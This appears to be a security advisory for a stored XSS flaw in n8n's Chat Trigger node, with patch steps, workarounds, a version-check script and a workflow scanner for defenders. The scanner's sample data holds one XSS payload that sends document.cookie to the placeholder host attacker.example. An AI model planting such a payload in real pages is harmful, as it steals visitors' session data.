CVE-2025-58177

5.4 MEDIUM

📋 TL;DR

This stored XSS vulnerability in n8n's LangChain Chat Trigger node lets an authenticated user with workflow-edit rights store malicious JavaScript in the node's initial chat messages. When that chat is made publicly available, the payload executes in the browser of anyone who opens the public chat URL, enabling phishing or theft of data exposed to that page. Organizations running n8n versions 1.24.0 through 1.106.0 with public chat access enabled are affected; 1.107.0 fixes it.

💻 Affected Systems

Products:
  • n8n workflow automation platform
Versions: 1.24.0 to 1.106.0
Operating Systems: All
Default Config Vulnerable: ✅ No
Notes: Requires both an n8n user with workflow-edit rights to plant the payload in the node's initialMessages parameter AND public access enabled on that Chat Trigger node. Visitors then only need to open the public chat URL; no further interaction is required.

📦 What is this software?

n8n is a workflow automation platform. Its LangChain Chat Trigger node starts a workflow from a chat interface and can expose that chat on a public URL; the vulnerability is in how that node's initial messages are rendered in the chat page.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker with workflow-edit access plants a payload that runs on n8n's own origin in the browser of every visitor to the public chat URL. It can exfiltrate data the page exposes (including any tokens or cookies readable by script), drive the visitor to phishing pages, or issue requests as that visitor, leading to account takeovers and data breaches.

🟠

Likely Case

Phishing attacks that capture user credentials or redirect users to malicious sites, potentially compromising individual user accounts.

🟢

If Mitigated

With no Chat Trigger node publicly exposed, the stored payload can only reach users who are already authenticated to n8n, so the remaining exposure is an insider with workflow-edit rights targeting other internal users.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires authorized user access to configure the vulnerable node and enable public access.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.107.0

Vendor Advisory: https://github.com/n8n-io/n8n/security/advisories/GHSA-mvh4-2cm2-6hpg

Restart Required: Yes (the running n8n process must be restarted, or the container recreated, to load the updated version)

Instructions:

1. Update n8n to version 1.107.0 or later (npm installs: npm install -g n8n@latest; Docker installs: pull a 1.107.0 or later image tag and recreate the container).
2. Verify the update completed: n8n --version should report 1.107.0 or later.
3. Test that existing Chat Trigger workflows still serve their chat and that initial messages render as plain text rather than as HTML.

🔧 Temporary Workarounds

Disable LangChain Chat Trigger Node

Platform: all

Prevent exploitation by disabling the vulnerable @n8n/n8n-nodes-langchain.chatTrigger node, for example by listing it in the NODES_EXCLUDE environment variable (a JSON array of node type names) before starting n8n. This breaks every workflow that uses the node; if chat workflows must keep running, turn off the public access option on each Chat Trigger node instead.

🧯 If You Can't Patch

  • Turn off public access on every Chat Trigger node, so the payload can only reach authenticated n8n users.
  • Serve the n8n chat URLs behind a reverse proxy that sets a strict Content-Security-Policy (no unsafe-inline scripts) to limit XSS impact; test that the chat UI still loads under the policy, since a policy that blocks the chat's own scripts will break it.
  • Review the initialMessages parameter of existing Chat Trigger nodes for HTML or script content before exposing them publicly.

🔍 How to Verify

Check if Vulnerable:

Check n8n version and verify if running between 1.24.0 and 1.106.0 inclusive.

Check Version:

npx n8n --version

Verify Fix Applied:

Confirm the n8n version is 1.107.0 or later (for Docker deployments, run n8n --version inside the container) and test chat trigger functionality.
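The version check above, carried out as an added example (not from the advisory or the n8n project): it parses the output of n8n --version and compares it against the affected range. The CLI invocation and the handling of pre-release suffixes are assumptions; the range boundaries come from the advisory.

```python
"""Added example (not from the advisory or the n8n project): decide whether an
n8n version string falls in the affected range 1.24.0 <= v < 1.107.0 and
optionally read the installed version from the n8n CLI."""
import re
import subprocess
from typing import Optional, Tuple

AFFECTED_MIN = (1, 24, 0)    # first affected release per the advisory
FIRST_FIXED = (1, 107, 0)    # patch version per the advisory

Version = Tuple[int, int, int]


def parse_version(text: str) -> Version:
    """Pull MAJOR.MINOR.PATCH out of CLI output such as '1.106.0'.
    Pre-release suffixes (e.g. '1.107.0-rc.1') are ignored, which treats an
    rc build of the fixed version as fixed; verify such builds by hand."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no MAJOR.MINOR.PATCH version found in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """True when the version lies inside the advisory's affected range."""
    return AFFECTED_MIN <= parse_version(version) < FIRST_FIXED


def installed_n8n_version(cmd=("n8n", "--version")) -> Optional[str]:
    """Run the n8n CLI (for Docker: docker exec <container> n8n --version)
    and return its output, or None if the command cannot be run."""
    try:
        out = subprocess.run(list(cmd), capture_output=True, text=True,
                             timeout=60, check=True)
    except (OSError, subprocess.CalledProcessError, subprocess.TimeoutExpired):
        return None
    return out.stdout.strip()


if __name__ == "__main__":
    raw = installed_n8n_version()
    if raw is None:
        print("n8n CLI not found; pass a version string to is_affected() instead")
    else:
        state = "AFFECTED (update to 1.107.0 or later)" if is_affected(raw) else "not affected"
        print(f"n8n {'.'.join(map(str, parse_version(raw)))}: {state}")
```

Run it on the host or inside the n8n container; if the CLI is not on PATH, paste the version from the n8n UI into is_affected().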

📡 Detection & Monitoring

Log Indicators:

  • Chat Trigger node definitions whose initialMessages parameter contains HTML tags, inline event handlers (onerror=, onload=) or javascript: URLs
  • Workflow edits that enable public access on a Chat Trigger node, especially by users who do not normally maintain chat workflows
  • Requests to chat trigger URLs of workflows that are not meant to be public

Network Indicators:

  • Chat page responses containing unexpected script tags or inline event handlers
  • Outbound connections from visitors' browsers on the chat page to unfamiliar domains (exfiltration or redirect targets)

SIEM Query (generic pseudo-syntax; adapt to your platform and ingest exported workflow definitions, since the node parameters are what carry the payload):

source="n8n" AND ("initialMessages" CONTAINS "<script" OR "initialMessages" CONTAINS "javascript:")

This query only catches the most naive payloads; an <img onerror=...> or any other inline event handler bypasses it, so match on HTML tags and on*= attributes as well.
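A detection pass over exported workflow JSON, as an added example (not n8n's own code), that goes beyond the query above: it flags every Chat Trigger node whose initialMessages contains HTML tags, inline event handlers or javascript: URLs, and rates public nodes higher. The export shape follows n8n export:workflow --all (a list of workflow objects with a nodes array); the node type name and the initialMessages parameter come from the page, while the parameter name public for the public-access toggle and the sample workflows themselves are constructed assumptions.

```python
"""Added example (not n8n's own code): scan exported n8n workflow JSON for
Chat Trigger nodes whose initialMessages carries HTML/JS injection markers."""
import json
import re
from typing import Any, Dict, List

CHAT_TRIGGER_TYPE = "@n8n/n8n-nodes-langchain.chatTrigger"  # from the advisory

# Deliberately broader than "<script>" / "javascript:": an <img onerror=...>
# payload executes just as well and would slip past the naive SIEM query.
SUSPICIOUS = re.compile(
    r"<\s*script|javascript\s*:|<\s*(?:img|svg|iframe|object|embed|math|body)\b"
    r"|\bon[a-z]+\s*=|srcdoc\s*=|data\s*:\s*text/html",
    re.IGNORECASE,
)


def naive_siem_match(text: str) -> bool:
    """The page's SIEM query, as a predicate: only '<script>' or 'javascript:'."""
    low = text.lower()
    return "<script>" in low or "javascript:" in low


def scan_workflows(exported: Any) -> List[Dict[str, Any]]:
    """Accept one workflow object or a list of them and return findings."""
    workflows = exported if isinstance(exported, list) else [exported]
    findings = []
    for wf in workflows:
        for node in wf.get("nodes", []):
            if node.get("type") != CHAT_TRIGGER_TYPE:
                continue
            params = node.get("parameters", {}) or {}
            text = params.get("initialMessages") or ""
            m = SUSPICIOUS.search(text)
            if not m:
                continue
            is_public = bool(params.get("public", False))  # assumed parameter name
            findings.append({
                "workflow": wf.get("name", "?"),
                "node": node.get("name", "?"),
                "public": is_public,
                "matched": m.group(0),
                # Public nodes expose the payload to anyone with the URL.
                "severity": "high" if is_public else "medium",
            })
    return findings


# Constructed sample export (not real data); attacker.example is a placeholder.
SAMPLE_EXPORT = json.loads(json.dumps([
    {"name": "Support bot", "nodes": [
        {"name": "Chat Trigger", "type": CHAT_TRIGGER_TYPE,
         "parameters": {"public": True, "initialMessages": "Hi there! How can I help?"}}]},
    {"name": "Lead capture", "nodes": [
        {"name": "Chat Trigger", "type": CHAT_TRIGGER_TYPE,
         "parameters": {"public": True,
                        "initialMessages": "Welcome <img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"}}]},
    {"name": "Internal test", "nodes": [
        {"name": "Chat Trigger", "type": CHAT_TRIGGER_TYPE,
         "parameters": {"public": False, "initialMessages": "<script>alert(1)</script>"}},
        {"name": "HTTP Request", "type": "n8n-nodes-base.httpRequest",
         "parameters": {"url": "https://example.invalid/<script>"}}]},
]))


if __name__ == "__main__":
    for f in scan_workflows(SAMPLE_EXPORT):
        print(f"[{f['severity']}] workflow={f['workflow']!r} node={f['node']!r} "
              f"public={f['public']} matched={f['matched']!r}")
```

Point it at the file written by n8n export:workflow --all --output=... to run it against a real instance. The "Lead capture" sample is the important one: it is public, it executes script, and the naive "<script>"/"javascript:" query does not match it.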
